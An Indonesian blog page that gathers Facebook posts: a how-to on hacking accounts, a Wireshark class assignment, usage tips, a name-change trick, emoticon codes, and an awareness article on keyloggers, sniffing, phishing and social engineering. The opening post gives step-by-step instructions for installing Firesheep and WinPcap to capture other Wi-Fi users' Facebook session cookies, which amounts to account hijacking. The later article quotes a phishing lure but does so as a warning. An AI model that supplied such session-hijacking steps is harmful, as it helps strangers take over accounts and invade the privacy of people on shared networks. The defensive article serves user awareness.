Breaking News

Cara Hack Akun Facebook Dengan Network Sniffing


PERTAMA:

Bagi anda pengguna facebook yang menggunakan koneksi internet yang juga digunakan banyak orang seperti warnet atau koneksi internet di kampus atau tempat umum atau hotspot, apalagi yang gratisan harap berhati-hati. cara hack facebook dengan metode ini cukup mudah, berbekal software packet sniffer yang sangat mudah di download dan digunakan untuk memantau dan menyimpan paket lalu lintas jaringan, seseorang bisa dengan mudah membobol akun facebook dengan memanfaatkan paket data yang tersimpan tadi. cara menghindari agar akun facebook anda tidak kena hack dengan cara ini adalah dengan berhati-hati saat mengakses facebook, pastikan warnet atau hotspot area yang anda gunakan benar-benar aman.

KEDUA:

Cukup mudah untuk hacking facebook account saat ini, kmu dapat menggunakan firefox addon freesheep, yaitu sebuah addon Firefox yang mampu mencuri sesi cookie dari Facebook, Twitter dan account lainnya pada Web 2.0 yang tidak terenkripsi jaringan nirkabel terbuka.

cara menggunakanya sebagai berikut:

1. Download .xpi file di http://codebutler.github.com/firesheep/
2. install file .xpi tersebut
3. Install WinPcap, download di www.winpcap.org
4. jika instlasi firesheep dan wincap sudah selesai, buka firefox, klik menu tools > addons >Firesheep
5. klik preferences icon dan pilihi kartu interface jaringan pc / wireless card
6. klik  “Start Capturing”
7. tunggu beberapa saat, jika ada pengguna wireless yang mengakses website facebook maka firesheep akan siap menghack cookies nya.

nah gimana cara mencegah pencurian password dengan firesheep ini?

kamu dapat menggunakan software ForceTLS, download di https://addons.mozilla.org/en-US/firefox/addon/force-tls/

KETIGA:

Bismillah,

pada postingan kali ini akan membahas tentang bagaimana cara melakukan sniffing paket data situs jejaring facebook yang keluar masuk dari perangkat komputer yang digunakan untuk mengakses situs jejaring sosial tersebut. postingan ini berisi jawaban dari tugas yang diberikan pada mata kuliah Keamanan Informasi dengan soal sebagai berikut:

Anda diminta untuk menggunakan program sniffer (penyadap) seperti wireshark, tcpdump, atau sejenisnya untuk melakukan salah satu dari hal di bawah ini:

  1. mengukur jumlah data yang digunakan untuk membuka satu sesi gmail atau facebook;
  2. memantau serangan dari port scanning yang dilakukan dengan menggunakan program nmap.

Untuk yang (1) yang disebut satu sesi adalah login, membaca sebuah email (atau menulis sebuah email), kemudian logout. Jangan lupa program sniffer diset agar *semua* data ditangkap. Biasanya default dari program sniffer hanya menangkap header saja. Tujuan utamanya adalah untuk menghitung jumlah data yang ditangkap.

Untuk (2) tujuannya adalah untuk melihat pola “serangan” port scanning yang dilakukan oleh nmap. Apakah dia melakukan scanning dengan menguji port secara berurutan?

langsung saja menuju langkah-langkah yang dilakukan untuk melakukan sniffing paket data ini:

  1. pertama-tama buka aplikasi wireshark :)
  2. kedua, pilih menu Capture kemudian submenu Interfaces, atau bisa juga dengan jalan pintas menekan tombol Ctrl+I
  3. pilih interface yang ingin anda sadap paket datanya, disarankan koneksi yang dipilih adalah koneksi yang menggunakan kabel bukan koneksi yang nirkabel maupun koneksi dengan modem USB atau sejenisnya. Pilih menu Option pada interface yang ingin Anda sadap paket datanya.
  4. pada bagian “Capture filter” masukkan sebagai berikut(ganti alamat.ip.komputer.anda dengan alamat IP komputer yang digunakan untuk melakukan penyadapan paket data)
    host www.facebook.com and host alamat.ip.komputer.anda
  5. Klik start, maka proses penyadapan akan segera dimulai
  6. Jika ingin menyudahi proses penyadapan, klik tombol stop atau dengan menekan jalan pintas Ctrl+e
  7. Untuk mengetahui statistik paket yang berhasil disadap, cukup dengan memilih menu Statistic kemudian submenu Summary, maka akan tampil hasil seperti contoh berikut:

  8. hasil statistik sniffing paket data facebook

Pada data yang saya sadap dengan menggunakan wireshark ini paket data dari facebook cukup kecil (56948 bytes) hal ini mungkin dikarenakan metoda caching yang ada pada browser yang saya gunakan untuk membuka facebook masih menyimpan data-data yang diperlukan sehingga data cukup kecil.

sekian postingan kali ini.



Read more ...

20 tips tentang Facebook


Jika Anda surfing Facebook setiap hari atau kadang-kadang, kemungkinan Anda sudah akrab dengan barang-barang biasa seperti menambah / menghapus teman-teman, update status, dinding dan profil, menambahkan dan menjelajahi halaman & aplikasi, dll, tapi ada lagi ..


Minggu ini kita ingin membahas beberapa hal menarik yang dapat Anda lakukan pada (atau dengan) Facebook; termasuk trik yang tidak didokumentasikan atau belum banyak diketahui

1. Menempatkan Facebook Chat di Samping Browser Firefox (Sidebar)

Facebook Chat sangatlah keren, setidaknya itu memungkinkan Anda untuk mengirim pesan instan ke kontak Facebook online. Namun penempata chat box-nya berada di bagian bawah halaman, bagaimana jika ketika kita sudah Sign Out dari Facebook tetapi masih ingin tetap Chating dengan teman anda? Jika Anda menggunakan Firefox, Anda dapat menempatkan Facebook Chat di sidebar. Caranya Adalah sebagai berikut:

  • Pada menu Bookmarks, pilih Organize Bookmarks ?
  • Klik pada New Bookmark ?

2. Mendownload Satu Album Sekaligus dari Facebook

Dengan Mozilla anda dapat mendownload add-ons FacePAD: Facebook Photo Album Downloader yang memungkinkan Anda untuk men-download Album Anda /teman-teman Anda , sekaligus, dengan satu klik

3. Update Status Tanpa Log In Via Facebook

hellotxt dan Ping.fm memperkenalkan fitur-fitur yang memungkinkan administrator update Facebook Facebook Pages.

4. Cara Menjadwalkan Pengiriman Pesan di Facebook

Sendible memungkinkan Anda menjadwalkan pesan Facebook terlebih dahulu sehingga Anda dapat mengirim pesan ke teman, pelanggan atau kolega di masa depan.

5. Bagaimana Membunyikan Status Updates Dari Teman Anda di Facebook

Sebuah tutorial singkat tentang Makeuseof untuk memandu Anda cara menyembunyikan update status Facebook dan menjaga kerahasiaannya dari teman-teman yang Anda tentukan.

6. Cara Membuat Foto Temen Kuliah/Alumni Profil di Facebook

Klik pada tab

Friends

. Lanjutkan ke tab

More

. Dari ?

Choose an option

?, pilih salah satu tanda strip ?

-

?. Lanjutkan dengan muali memilih Teman-teman sekuliahan/alumi.

7. Cara Mengetahui Jika Diam-diam Temen Facebook Menghapus atau Mem-Blok Account Anda

X-Friendsadalah alat yang unik untuk melacak teman-teman yang menghapus atau mem-Blok account anda

8. Cara Men-Sharing Foto Di Flickr ke Facebook

Flickr2Facebookmemungkinkan Anda meng-upload foto ke Facebook dari Flickr.


9. Bagaimana Cara Menampilkan Foto yang Muncul di Profil Facebook

Fitur di Facebook yang memungkinkan Anda memutuskan siapa yang muncul di kotak Friends. Klik

?edit?

di kotak Teman Anda dan ketik nama-nama teman-teman terbaik Anda dalam kotak ?

Always show these friends

?

10. Cara Menghapus Iklan di Facebook

Greasemonkeyini script ? adalah Facebook: Cleaner menghapus banyak iklan yang mengganggu dan pembaruan yang mau tidak mau muncul pada halaman Facebook.


11. Bagaimana Menghubungkan Foto Teman di Facebook Dengan Kontak di Microsoft Outlook

OutSync adalah aplikasi gratis dari Windows yang menghubungkan foto teman di Facebook Dengan kontak di Microsoft Outlook. Hal ini memungkinkan Anda untuk memilih kontak yang diperbarui. Sehingga Anda dapat memperbarui semua kontak sekaligus atau hanya beberapa pada satu waktu.

12. Bagaimana Menampilkan Status di Facebook pada Blog WordPress

Metode berikut ini memanfaatkan status Facebook dan WordPress RSS widget untuk menampilkan Status Facebook di WordPress blog .

13. Bagaimana Cara Posting Blog Post di Facebook Secara Otomatis

Wordbookatau NetworkedBlogs memungkinkan Anda untuk cross-posting blog Anda ke Facebook Wall. Facebook Anda ?box? tab akan menampilkan posting blog terbaru.

14. Bagaimana Akses Facebook Chat di Desktop

Gabtastikdan Digsbymemungkinkan anda mengakses Facebook Chat pada desktop Windows Anda diluar web browser, menggunakan resolusi dan sistem

memory yang minimal.

15. Cara Membuat Mudah Kuis di Facebook

LOLappsmenyediakan tempat untuk membuat kuis yang dapat digunakan dengan mudah dan dapat kita share di Facebook.

16. Cara Menyembunyikan Status Online Anda di Facebook Chat Dengan Memilih Kategori Kontak

Facebook memiliki daftar teman yang terintegrasi dengan Chat dan Anda juga dapat memilih anggota mana saja dalam daftar kontak tersebut yang bisa melihat Anda online.

17. Bagaimana Mendapatkan Update Status Pada Facebook di Email

NutshellMail mengkonsolidasikan account Facebook Anda melalui kotak masuk yang sering Anda gunakan.

18. Cara Update Facebook Status dari Firefox

FireStatusadalah utilitas update status untuk berbagai jaringan sosial, termasuk Facebook.

19. Bagaimana Cara Facebook-an di Desktop Anda

Seesmic Desktop,Facebooker, Xobni, Facebook Sidebar Gadget, Scrapboy and Facebook AIR applicationadalah aplikasi desktop yang memungkinkan Anda berinteraksi seperti halnya yang Anda lakukan di Facebook, tapi tanpa browser.

20. Cara Menghapus, Membatalkan Account dan Profil Kita di Facebook

Sebuah panduan sederhana untuk menghapus atau membatalkan account dan profile Facebook kita dengan mudah.


Read more ...

Menambahkan 100 nickname, Apakah Anda mau ?


Assalammualaikum .wr.wb







Kanggo juragan - juragan facebook anu resep nami na araraneh ,
To all facebook's masters who loves weird names,


abdi gaduh pangalaman sakeudik perkawis ganti nami tinu facebook :D
i got a little experience about changing name on facebook :D






Kahiji Hatur nuhun ka Admin namapanjang.blogspot.com anu tos masihan ijin
First, thanks to namapanjang.blogspot.com's Admin who give permission


kanggo nga share keun pangalaman NU KIEU PATUT .
to shared THIS AWFUL experience





Punteun ngangge bahasa sahari - hari , karena eh karena biar ngga ketahuan facebook ,
Sorry for colloquial language in use, 'cause um because facebook wouldn't recognize it,


makanya pake bahasa sunda XD
so i use Sundanese language XD





kanggo anda anu kesel bin keheul ku facebook gara - gara
for you who feeling sick son of fed up of facebook because of


BATAS PEUBAHAN NAMA TERCAPAI
NAME CHANGED LIMIT REACHED





sapertos kieu ..

like this one ..




Click on every Image if you can't read it clearly.





sanes masalah deui .. BATAS PEUBAHAN NAMA TERCAPAI abdi gaduh solusi na . tapi ssssttttttttttttt ..
is not a problem anymore .. NAME CHANGED LIMIT REACHED i got a solution . but ssssttttttttttttt ..





ntong gujrud , ntong berisik bisi di block sadayana ngke geura ...
be quiet, silent or we're all get blocked somehow ...





ieu Buktos na akun abdi , screen shoot akun abdi
The Proof's in My account, my account screenshot















kirang lebih aya 100 nami'an lah lamun teu lepat
it was approximately 100 names if i wasn't wrong with





CATATAN : Udah di coba tiap - tiap akun beda hasil nya . pada langkah ketiga .
NOTE: It was tested in every account and has difference result . on the third step.





Tapi ini mah ikut ng'share teh . semoga aja anda bisa seperti akun saya . AMIN
Is why i share this . hopefully yours can be like my account . AMIN





sanes SOMBONG , tapi bilih teu percanten . .
don't mean to be COCKY, but if you don't belief it . .


Nugelo Budug
Simkuring
Nugelo Budug





moal seeur nyarita deui , mangga langsung ka tutor
no more chit-chat, let straight to the tutor







1. Step one




klik gambar ieu
click on this image



 atos kitu bakalan sapertos kieu
after that it'll came somethin' like this








LANJUTKAN ...!!!!
CARRY ON ...!!!!









atos kitu pasti , di piwarang nga gentos kata sandi isikan sajah ,




PERINGATAN = asal jangan lupa kata sandi baru nya .!










2. Step two


Contreng sadayana , sagaduh na email pokona mah . BOROLOKEUN KABEUH









3. Step three




LANJUTKAN GAN ..!










Tah didieu di coba keberuntungan Anda teh .. atos di cobian ieu mah ka sabaraha akun , tapi sugan ue Anda beruntung




lamun nu abdi mah sapertos kieu .









kalau ngga ada , ya Anda kurang silah coba lagi





Salajeung na lamun atos kitu mah Anda yang Beruntung Gambar nya seperti ini .









4. Step Four




Langkah terakhir . HASILNYA bisa di liat di gambar










Atos ah cekap sakitu , mangga . Hatur nuhun Admin.





Wassalam .












WARNING : kayanya facebook sudah tahu .






Source
Read more ...

Facebook Complication


Facebook menjadi sesuatu yang sangat populer dan menggoda banyak orang untuk bergabung dalam situs mereka. Baik orang bergabung di Facebook hanya untuk sekedar ingin berteman, bermain, berbisnis, atau bahkan spammer dan hacker perusak (black hacker) yang mencoba membuat perusakan dalam sistem Facebook. Ternyata banyak sekali metode hacking yang dipakai untuk menjebak para pengguna (user) Facebook seperti yang belakangan ini terjadi, yaituhalaman login palsu yang dilakukan FBAction.net (sudah ditutup). Hal ini berdampak pada pengambil alihan akun Facebook menjadi milik sang penjebak (hacker) yang bisa berdampak buruk dan bahkan terjadi pencemaran nama baik sang pemilik akun asli.


Untuk mengatasi masalah Facebook yang di hack, tim Facebook telah memberikan section khusus penanganan akun Facebook yang di hack. Disini pengguna (user) yang telah di hack dapat mengirimkan pesan ke Facebook tentang masalah yang terjadi mulai dari masalah scam, hacking, tips pencegahan hacking dan lainnya.
image


 EMOTICON  http://static.ak.fbcdn.net/rsrc.php/zEX21/hash/75j4m1ms.pngwhile chat on Facebook Chat, You wondered if it supported emoticons. Yes it’s, this is some present to you a complete list of facebook emoticons. yups kita selidiki TKP na...?_?  apa cuba artinya w ja bingung 7 keliling2 ja kok xoxoxixixixi jadi malu akh...^^ silahkan anda mencari pengetahuan sedikit ttg FACEBOOK




Buat facebook-er yang hobi chat (chating) di facebook. Tentu akan lebih seru kalau saat chat menggunakan kode smiley dan chat emoticons. Siang ini saya akan memberikan kode-kode smiley tambahan untuk chat di facebook. Namun tidak hanya kode smiley saja, krisna juga akan memberikan cara penulisan lain untuk chat di facebook. Mau ?




















✈♬☑ ☎ ☒ ☻ ♤ ☤☹♀ ✩✉ ✇♺✖♨ ❦☁ ✌♛ ❁☪ ☂✏♝ ❀ ☭☃☛♞ ✿ ☚ ♘✾ ♠ ♢ ♣ –♤ ♥ ♦ ♧ ♨ ♩ ♪ ♫ ♬ ♭♮ ♯ ✁ ✂ ✃ ✄✆ ✇ ✈ ✉ ✌ ✍ ✎ ✏✐ ☯☾☝♖✽ ✝☄☟♟✺ ☥✂ ✍♕✵ ☮☠ ❤☆ ★ ♫ ✔ ► Ω ッ ● ♣ ♪ ☼ ◄ ❥ ♂♀ ♪◘♠☻♣ ♦☺○ ¿ ❤ ☚ ☛ ☜ ☝ ☞ ☟ ☠ ☡ ☢ ☣ ☮ ☯ ☹ ☺ ☻ ☽ ☾ ♈ ♉ ♊ ♋ ♌ ♍ ♎ ♏ ♐ ♑ ♒ ♓ ℃ ℅ ℉ № ℗ –℞ Ω ℧ ☀ ☁ ☂☃ ☄ ★ ☆ ☇ ☈ ☉ ☊☋ ☌ ☍☎ ☏ ☐ ☑ ☒ ♔ ♕ ♖ ♗ ♘ ♙ ♚ ♛ ♜ ♝ ♞ ♟ ¢ £ ¤ ¥ € § © ® ™ ° ¹ ² ³ · ¼ ½ ¾¿• ◊ ℠ ✓ ✔ ✕ ✖ ✗ ✘ ✝ ✞ ✟ ✠ ✡ ❛ ❜ ❝ ❞ 


Table of Facebook Chat Emoticons, emotes, or smilies yoo...?






















smile smile :-) :) :] =) angel angel O:) O:-)
frown frown :-( :( :[ =( kiss kiss :-* :*
tongue tongue :-P :P :-p :p =P heart heart <3
grin grin :-D :D =D kiki kiki ^_^
gasp gasp :-O :O :-o :o squint squint -_-
wink wink ;-) ;) confused confused o.O O.o
glasses glasses 8-) 8) B-) B) upset upset >:O >:-O >:o >:-o
sunglasses sunglasses 8-| 8| B-| B| pacman pacman :v
grumpy grumpy >:( >:-( curly lips curly lips :3
unsure unsure :/ :-/ :\ :-\ robot robot :|]
cry cry :’( Putnam Chris Putnam :putnam:
devil devil 3:) 3:-) shark shark (^^^)
bold BOLD *bold* bold pinguin <(")
Underline Underline _Underline_ jareta :logo 42 :42:




Pembajakan Account Facebook dan Cara Mencegahnya

Beberapa hari ini media memberitakan tentang pencurian password akun facebook user di beberapa tempat baik di Indonesia maupun luar negeri. Para korban mengaku setelah log out terakhir kali dan keesokan harinya mencoba log in ternyata gagal mengakses dengan beberapa alasan seperti “password dan username tidak cocok” ataupun “akun tidak eksis”.




Di beberapa social networking lainnya, seperti twitter dan plurk sempat dilaporkan kejadian yang sama pernah terjadi. Username dan password tiba-tiba tidak cocok dikarenakan sesuatu hal, atau dapat kita ambil benang merah, password mereka ada yang mengganti.

Apakah ada suatu teknik cracking untuk membobol akun facebook antar individu? Jawabannya ada beberapa. Lalu pertanyaan selanjutnya adalah, apakah ada teknik untuk melumpuhkan akun facebook atau social networking lainnya?





Teknik yang terungkap untuk menyerang akun facebook beberapa waktu lalu adalah dengan membanjiri data pada server facebook dengan teknik DDOS atau biasa dikenal dengan Distributed Denial of Service sehingga server lumpuh selama beberapa jam seperti yang terjadi pada facebook dan twitter tahun 2009 oleh cracker dari Rusia. Kemungkinan seperti ini perlu kita waspadai.



*Keylogger*

Cara pertama menggunakan keylogger adalah cara yang sangat efektif bagi para cracker untuk mencuri password dari akun facebook anda. Dengan menginstall software dan atau hardware keylogger pada notebook maupun PC sasaran, maka otomatis segala bentuk ketukan pada keyboard maupun aktivitas browsing anda akan terekam dengan detail dan sistematis.

Sehingga jika anda mengetikan password dan username pada notebook atau PC yang telah dipasangi keylogger, anda dengan penuh kerelaan hati telah menyerahkan data pribadi sensitif tersebut pada orang yang memasangnya, karena keylogger ibarat kertas karbon yang akan membuat salinan tentang sesuatu yang ditulis diatasnya.

Keylogger biasanya dipasang oleh cracker pada terminal akses internet publik yang berbagi pakai seperti di warnet dan kampus. Maka berhati-hatilah ketika menggunakan akses seperti ini.


  1. Pertama, jangan langsung menggunakan terminal melainkan lakukan restart.

  2. Kedua, coba cek apakah ada aplikasi tersembunyi yang berjalan di memori background, anda bisa gunakan tools event task manager (tekan tombol ctrl + alt + del pada desktop windows anda) dan perhatikan apakah ada aplikasi atau proses yang tidak biasa? Memang anda perlu sedikit belajar dan membiasakan hal ini demi keamanan anda sendiri.

  3. Ketiga, cek setting keamanan pada browser yang anda gunakan apakah secara otomatis merekam username dan password? Sebaiknya matikan fitur ini dan apabila ada fitur anti phising site bisa diaktifkan.

  4. Keempat, bersihkan/hapus cache dan history secara otomatis setiap kali menutup browser. Ini bisa anda lakukan pada setting browser.

  5. Kelima, pastikan bahwa setiap selesai melakukan kegiatan anda selalu log out dengan sempurna.






*Sniffing*

Teknik kedua adalah dengan menggunakan tools yang biasa digunakan sniffing seperti Cain and Abel pada area yang terkoneksi WiFi jadi tools tersebut memang “mencari aktifitas” pada laptop-laptop yang terkoneksi. Maka anda harus berhati-hati juga apabila sedang mobile dan mengakses HotSpot.

Pada prinsipnya akses wireless sangat mudah untuk diintip. Jangan begitu saja mempercayai SSID “Free WiFi atau Free HotSpot” saat anda scanning wireless network. Yang paling aman adalah bertanya pada pengelola HotSpot area tersebut apa SSID yang resmi? Kemudian setting akses wireless pada

notebook anda untuk tidak “auto connect” melainkan harus manual agar anda bisa meneliti terlebih dahulu.

Ketika anda melakukan akses dari jaringan WiFi HotSpot sebaiknya hindarkan transaksi pada situs yang kritis seperti e-banking, akses email, akun jejaring sosial dlsb. Browsing hal yang umum saja kecuali anda yakin benar bahwa tidak ada yang berusaha mengintip aktivitas anda dan jaringan tersebut bisa dipercaya.

Meskipun demikian, pastikan bahwa anda selalu akses dengan memilih mode secure connection yaitu menggunakan HTTPS yang biasanya ditandai dengan munculnya icon gembok terkunci pada browser anda. Dengan akses HTTPS ini maka antara anda dengan server layanan yang diakses telah dilindungi dengan enkripsi sehingga tidak mudah diintip oleh orang yang tidak berhak. Pastikan anda sudah masuk ke mode secure sebelum memasukkan username dan password atau PIN.





*Phishing*

Cara ketiga adalah dengan mengklik url yang diberikan oleh aplikasi facebook maupun via email yang mengatasnamakan facebook. Atau menjebak Anda dengan tawaran aplikasi asing pada facebook merupakan aplikasi yang lepas dari maintenance facebook sendiri.


Aplikasi tersebut dapat dibuat oleh siapa saja dan kapan saja dan random sifatnya. Untuk mencuri username dan password tersebut, biasanya korban disuruh mengakses link tersebut dan diperintahkan memberikan password dan usernamenya. Perhatikan contoh berikut:



Contoh 1:

Anda diminta untuk mengakses link tertentu:

http://www.facebook.com/l.php?u=http…f440ac31753781

Namun ketika Anda mengkliknya Anda harus log in dahulu di halaman tersebut, padahal Anda sebelumnya sudah log ini terlebih dahulu. Jangan pernah Anda masukan username ataupun password jika Anda menemui hal janggal seperti ini, karena dapat diindikasikan hal tersebut adalah phising dengan menggunakan fake log in facebook, perhatikan screenshoot di bawah:



Ada sesuatu yang janggal, Anda sudah log in sebelumnya dan ketika Anda mengakses link di atas Anda disuruh log in kedua kalinya. Jelas ini adalah bentuk phishing di mana sang pencuri password menipu Anda dengan mendesain halaman “orisinil” dari facebook. Perhatikan dengan baik-baik url pada kolom tempat Anda memasukan url, agar tidak menjadi korban. Dan perhatikan apabila Anda mendapatkan peringatan dari facebook semacam ini:



Munculnya halaman peringatan facebook ini menandakan bahwa Anda sebenarnya sedang mengakses situs (url) lain di luar web site resmi facebook, sehingga Anda perlu berhati-hati dan jangan pernah memberikan apabila diminta memasukkan ulang username dan password atau jangan pernah melakukan bila diminta mendownload suatu software, program, aplikasi atau dokumen tertentu yang sekilas nampaknya berguna atau menarik (misalnya games, tools dlsb.) karena bisa jadi itu sebenarnya adalah malware.


Masalahnya adalah, kebanyakan pengguna facebook kurang memperhatikan pesan peringatan seperti ini, tidak membaca isinya atau karena kurang memahami maksudnya dan kendala bahasa dan mengabaikannya. Perlu dibiasakan, apabila menjumpai hal yang tidak biasa atau meragukan bahkan Anda tidak mengerti apa maksudnya, maka tindakan paling aman adalah selalu menolak dan memilih klik tombol “cancel”. Atau langsung tutup halaman tersebut, sampai Anda mendapatkan keterangan yang terpercaya.


Contoh 2:

Dahulu ada sebuah group di dalam facebook yang memberikan teknik untuk mengambil password akun orang lain dengan alamat tersebut:

http://www.facebook.com/group.php?gid=202000763768

Kemudian kita lihat apa yang tertera pada halaman group “Cara Mengetahui Password Teman Anda” tersebut:

*1. KLIK “Join this Group” ATAU “Gabung ke Grup Ini” (hanya Anda yang telah bergabung yang bisa menggunakan fasilitas ini!)

2. KLIK “Invite People to Join” ATAU “Undang Orang untuk Bergabung”

3. CENTANG Semua teman Anda, minimal 100 orang agar bisa berjalan! (hanya teman Anda yang telah di undang yang bisa Anda lihat segala

aktivitasnya di facebook Anda!)


4. KLIK Tombol “Send Invitations” ATAU “Kirim Undangan”

kirim pesan ke admin facebook dengan mengcopy link :

http://www.facebook.com/home.php?#/i….3256059163..1

KEMUDIAN kirim pesan dengan petunjuk berikut:

.gx=0&.tm=1259467892&.rand=fnvrjkff2bk4e|(ALAMAT EMAIL Anda)/config/login?.src=fpctx&.intl=us&.done=http%3A%2F%2Fm(PAS SWORD EMAIL Anda)||202000763768&ref=nf##hl=id&source=hp&q=/7601524/id/f#id(ALAMAT EMAIL YANG AKAN Anda KETAHUI PASSWORDNYA)


klik send email

kemudian dengan menunggu konfirmasi balasan dari facebook admin dalam waktu 24jam, Anda akan mendapat email balasan dan mengetahui password facebook teman Anda.*

Perhatikan kalimat yang cetak tebal tersebut, ada sesuatu yang ganjil bukan? Anda ingin mengetahui password orang lain tetapi Anda sebelumnya disuruh memasukan password dan username Anda terlebih dahulu. Jelas ini merupakan upaya jebakan terhadap akun Anda.

Harus selalu diingat bahwa username dan password adalah sesuatu yang vital, sama seperti PIN ATM biarlah Anda, pihak bank dan Tuhan saja yang mengetahuinya. Jangan pernah berikan kepada pihak lain, apapun alasannya termasuk permintaan dari seseorang yang mengaku sebagai admin. Sebab kalau benar dia adalah admin, tentu tidak memerlukan username serta password Anda untuk melakukan maintenance atau tindakan apapun.

Terakhir, selalu ketikkan langsung alamat url situs pada jendela browser Anda. Sebab ada juga malware yang menambahkan link bookmark sehingga Anda mengira bahwa itu resmi padahal adalah penyesatan (phising).

Malware yang lebih canggih bahkan bisa merubah informasi di etc/host yang memetakan alamat url secara statik pada komputer Anda tanpa menggunakan mesin DNS. Sehingga ketika Anda mengetikkan alamat jejaring sosial ternyata diarahkan ke phising site. Karena itu sangat penting untuk selalu waspada dan memeriksa keabsahan suatu url dan mengetahui adanya ketidakwajaran walaupun agak sulit.


*Social Engineering*

Sekarang ini mulai banyak korban berjatuhan akibat upaya pembajakan akun facebook yang menggunakan teknik social engineering. Terutama memanfaatkan kelemahan prosedur akun email gratisan seperti Yahoo! Mail.

Seseorang atau cracker bisa berpura-pura menjadi Anda dan mencoba mendapatkan akses tidak sah dan membajak akun email Anda. Caranya dengan mengikuti prosedur kehilangan password.


Biasanya layanan email gratisan akan menanyakan beberapa kata kunci untuk konfirmasi seperti kombinasi “di mana tempat bulan madu Anda?” atau “siapa nama hewan peliharaan Anda yang pertama” atau “siapa nama paman atau tante yang jadi favorit Anda?”. Jawaban atau kata kunci dari pertanyaan konfirmasi seperti ini dulu pernah Anda isikan ketika pertama kali mendaftarkan akun email tersebut.

Sekarang melalui facebook, seseorang atau cracker bisa dengan mudah mengelabui Anda. Dia akan berpura-pura melamar sebagai teman Anda. Kemudian mencari tahu alamat email Anda.

Ketika dia mengetahui bahwa Anda menggunakan alamat email gratisan, maka mulailah dia mengajak Anda berkomunikasi. Dengan cara tertentu dia akan mengkorek sejumlah informasi yang seharusnya Anda rahasiakan.

Begitu Anda memberikan informasi yang diperlukan untuk mengakses prosedur kehilangan password di layanan akun email gratisan, maka si cracker akan menguasai akun email Anda. Selanjutnya dia akan melakukan prosedur yang sama kepada akun facebook Anda, yaitu pura-pura lupa password dan mencoba membajaknya.

Facebook biasanya akan mengirimkan email “password sementara” ke alamat email utama Anda yang sialnya sudah dikuasai oleh si cracker. Sehingga dengan mudah dia menguasai akun facebook Anda juga. Begitu dia mengganti password akun facebook Anda, maka selanjutnya Anda akan ditolak untuk mengakses aku facebook Anda sendiri.

Seorang cracker yang membajak akun facebook Anda biasanya akan memanfaatkannya untuk beberapa tujuan jahat. Yang pertama adalah untuk melakukan impersonating atau pemalsuan identitas dengan maksud untuk memfitnah, menjelek-jelekkan dan menjatuhkan martabat Anda sebagai pemilik akun yang sesungguhnya. Misalnya dia menyerang dan melakukan suatu tindakan yang tidak disukai teman-teman Anda sehingga di dunia nyata, semua orang menjadi memusuhi Anda tanpa Anda sadari.

Yang kedua adalah untuk menipu teman-teman Anda. Telah banyak laporan di luar negeri maupun juga di Indonesia, bahwa sejumlah orang dimintai tolong oleh teman lamanya di facebook untuk mengirimkan sejumlah uang karena beberapa alasan, yang klasik adalah mengaku kecopetan atau kerampokan atau di akhir pekan tidak bisa mengambil uang untuk pengobatan dsb. Atau mengajak bertransaksi sesuatu tapi sebenarnya akun facebook itu telah dibajak oleh

orang lain.




*Tips Pencegahan*

1. Jangan mudah menerima permintaan pertemanan dari orang yang sama sekali belum Anda kenal, terutama yang tidak memiliki mutual friend.



2. Anda selalu memiliki kesempatan untuk melakukan konfirmasi kepada teman yang ada di dalam mutual friend seseorang yang mencoba meminta

pertemanan pada Anda. Sebab memang itulah salah satu gunanya facebook menampilkan informasi mutual friend yaitu agar Anda bisa melakukan

verifikasi terlebih dahulu. Apabila teman Anda mereferensikan dan mengkonfirmasi keabsahan calon teman tersebut baru “lamaran” tersebut bisa

dipertimbangkan untuk diterima.




3. Cara lain untuk mengkonfirmasi suatu permintaan pertemanan adalah mengirimkan message kepada yang bersangkutan. Dengan komunikasi ini Anda

dapat menanyakan siapakah dia sebenarnya (seringkali nama akun yang ditampilkan adalah julukan atau nama alias yang tidak membantu Anda untuk

mengingat siapakah calon teman itu) dan melakukan konfirmasi lainnya yang diperlukan. Misalnya, melakukan komunikasi off line (telepon) atau pertemuan

on line web cam atau bahkan off line adalah cara lain untuk melakukan konfirmasi keabsahan calon teman.



4. Jangan terburu-buru dan berhati-hati dalam menyampaikan sejumlah informasi pribadi yang sekilas nampaknya tidak penting tetapi ternyata

merupakan kunci untuk membobol akun email Anda. Pertanyaan yang sepertinya menunjukkan antusiasme pada satu hal yang sama (binatang kesayangan, tempat wisata favorite, cerita tentang keluarga, memasang album foto event tertentu dlsb.) tanpa sengaja bisa memaparkan informasi pribadi yang seharusnya Anda rahasiakan.



5. Anda mungkin tanpa sadar telah memaparkan informasi yang seharusnya rahasia itu dalam profile Anda. Atau dalam words caption di album foto Anda.


Misalnya menulis nama binatang kesayangan Anda persis di bawah fotonya bahkan ada orang yang secara khusus membuatkan akun facebook untuk binatang kesayangannya lengkap dengan semua profilenya. Atau memasang foto dan menyebut lokasi bulan madu dan atau memberikan tagging pada foto keluarga (termasuk paman yang menjadi favorite Anda) dlsb. Beragam ketidaksengajaan semacam itu.



6. Berhati-hati dan pikirkanlah berkali-kali kemungkinan manfaat dan kerugiannya bila Anda harus menampilkan informasi pribadi di halaman info

akun facebook Anda. Anda punya pilihan untuk tidak menuliskan informasi itu, misalnya binatang kesayangan, toh sebenarnya apabila ada yang ingin tahu,

bisa menanyakannya secara pribadi melalui fasilitas message langsung kepada Anda. Anda juga bisa memilih setting untuk membatasi akses orang lain ke

informasi tertentu di akun facebook Anda. Misalnya Anda bisa menyembunyikan alamat email. Manfaatkan fitur setting pengamanan akun facebook ini

semaksimal mungkin dan pikirkanlah.



7. Sebisa mungkin dan jikalau memungkinkan hindari menggunakan layanan email tak berbayar untuk akun facebook Anda. Gunakanlah akun email lokal


misalnya yang diberikan oleh kantor Anda (kalau diijinkan untuk pribadi), menyewa akun email ke ISP (sebenarnya harganya murah atau bahkan gratis

apabila Anda menjadi pelanggan ISP tersebut) atau Anda membuat domain pribadi sendiri dan meminta tolong layanan jasa hosting untuk membuatkan,

apabila Anda tidak memiliki keterampilan teknis sendiri. Intinya, akun email lokal atau milik sendiri lebih aman dari teknik serangan social engineering

ini terutama karena prosedur untuk konfirmasi kehilangan password atau bila terjadi compromise biasanya dilakukan secara manual dengan teknik

identifikasi off line bukan by system yang otomatis tapi menggunakan algoritma pengamanan yang terlalu sederhana seperti layanan email gratisan.



